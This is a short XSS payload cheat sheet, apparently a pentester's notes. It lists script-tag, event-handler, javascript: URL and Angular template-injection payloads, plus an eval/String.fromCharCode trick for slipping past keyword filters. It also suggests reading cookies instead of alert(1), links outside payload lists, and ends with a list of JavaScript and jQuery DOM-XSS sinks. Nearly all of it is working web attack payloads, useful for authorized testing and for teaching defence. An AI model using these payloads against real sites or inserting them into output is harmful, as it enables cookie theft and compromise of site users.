The Payload

Common

1. <script>alert(document.domain)</script>
2. javascript:alert(document.cookie)

Tag Attribute

1. <a href="javascript:alert(document.domain)">
2. <img src="p" onerror="alert(document.domain)">
3. <iframe src="https://example.com/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
4. "><svg onload=alert(document.domain)>
5. "></select><img src=1 onerror=alert(document.domain)>

Angular

1. {{$on.constructor(‘alert(1)’)()}}

Others

1. Using eval() and combined with String.fromCharCode()
   • case: probably we able to run <script> tag but the word alert() is blocked.
   • example: <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41))</script> for represent eval(alert(document.domain)).

Note

Avoid to use alert(1) inside javascript execution, use this might will more useful data:

1. document.domain: ref
2. document.location: ref
3. document.cookie: ref

For example: <img src="p" onerror="alert(document.domain)">

Other Ref

• https://github.com/payloadbox/xss-payload-list
• https://github.com/terjanq/Tiny-XSS-Payloads
• https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

---

JavaScript Sinks That Lead DOM-XSS Vulnerabilities

// ========== JavaScript ==========
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
 
// ========== JQuery ==========
add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()